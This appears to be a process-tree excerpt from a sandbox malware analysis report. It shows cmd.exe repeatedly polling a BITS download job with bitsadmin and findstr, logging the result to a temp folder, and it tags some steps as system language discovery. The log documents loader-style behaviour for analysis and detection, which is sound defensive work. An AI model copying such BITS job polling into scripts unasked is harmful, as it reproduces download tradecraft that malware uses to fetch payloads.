C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2196
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3204
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:928
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4052
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4016
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2084
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:292
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:816
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1140
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2900
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3972
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2864
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1936
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:904
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3916
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3884
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3804
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:656
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2192
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3964
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:3312 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3868
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3872
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2036
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1280
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3980
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:864
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3772
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2736
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2372
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3684
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3716
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1972
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2680
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3144
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3076
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2788
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1488
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2028
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2580
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4000
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3440
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3736
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2620
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2812
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3708
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:4076
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2296
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:480
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2968
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:912
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3748
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3976
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1688
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1628
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3224
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3660
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1072
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3964
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2064
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3348
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3156
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3352
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2984
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3684
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3816
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1664
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2680
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2304
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1244
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3172
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:4040
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1908
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3140
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1260
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:352
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1584
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2828
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4088
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3732
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3464
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2652
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2060
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2408
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2208
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2940
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1076
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2616
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4052
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2264
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵
- System Location Discovery: System Language Discovery
PID:3204
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2976
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3252
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1284
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3008
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵
- System Location Discovery: System Language Discovery
PID:2820 -
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1668
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3748
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3260
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1628
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3660
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:936
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2744
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2152
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1216
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3868
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3312
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2192
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3980
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3804
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:656
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3136
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:4004
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2412
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1960
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2780
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3148
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2680
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3432
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3112
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:3144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1244
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:2292
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3256
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:3140
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:3176
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2028
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1672
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:4036
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵
- System Location Discovery: System Language Discovery
PID:1932
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:2652
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:1076
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:1524
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:3456
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /V "^$"6⤵PID:2376
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /info dwnl-task-11125 | findstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools" | findstr /R /V "^$" > "C:\Users\Admin\AppData\Local\Temp\dwnl_11125\log_bits_info.txt"5⤵PID:2264
-
C:\Windows\SysWOW64\bitsadmin.exebitsadmin /info dwnl-task-111256⤵PID:4032
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V /C:"BITSADMIN version" /C:"BITS administration" /C:"(C) Copyright" /C:"BITSAdmin is deprecated" /C:"Administrative tools"6⤵PID:1288
-
-
